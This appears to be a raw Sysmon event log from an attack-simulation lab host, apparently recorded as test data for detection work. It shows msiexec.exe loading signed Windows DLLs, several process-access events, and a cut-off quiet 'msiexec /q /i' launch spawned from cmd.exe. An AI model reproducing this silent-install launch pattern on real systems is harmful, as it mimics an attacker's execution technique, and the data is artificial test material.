10341000x80000000000000002699932Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699931Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 18141800x80000000000000002699928Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-ConnectPipe2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736\wkssvcc:\windows\system32\msiexec.exeWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699926Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699925Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699924Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699923Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699922Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\msctf.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=CA0121D9089BBFE1CB95A04E09E04C90,SHA256=B264FBE125E02FFBCDBBFF811B75B3ECEF31FD7762BD67BEE41492ED33CC146FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699919Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699918Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699917Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699916Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699915Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699914Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699913Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.381{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699912Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699911Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699910Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699909Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699908Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699907Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699906Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699905Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699904Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699896Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699889Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699887Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699884Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699882Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699877Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699876Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699874Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699873Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.366{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699872Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699871Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699870Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699869Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699868Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699867Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699866Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699865Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699864Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699863Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699861Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002699860Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699858Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-EE97-62A8-7E00-000000006202}18083200C:\Windows\system32\csrss.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699857Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.350{7CF983DC-9829-62AC-576B-000000006202}6281956C:\Windows\SYSTEM32\cmd.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\SYSTEM32\cmd.exe+f1e1|C:\Windows\SYSTEM32\cmd.exe+11a37|C:\Windows\SYSTEM32\cmd.exe+cb0d|C:\Windows\SYSTEM32\cmd.exe+c295|C:\Windows\SYSTEM32\cmd.exe+f916|C:\Windows\SYSTEM32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002699856Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.359{7CF983DC-9829-62AC-596B-000000006202}3736C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\windows\system32\msiexec.exe /q /i 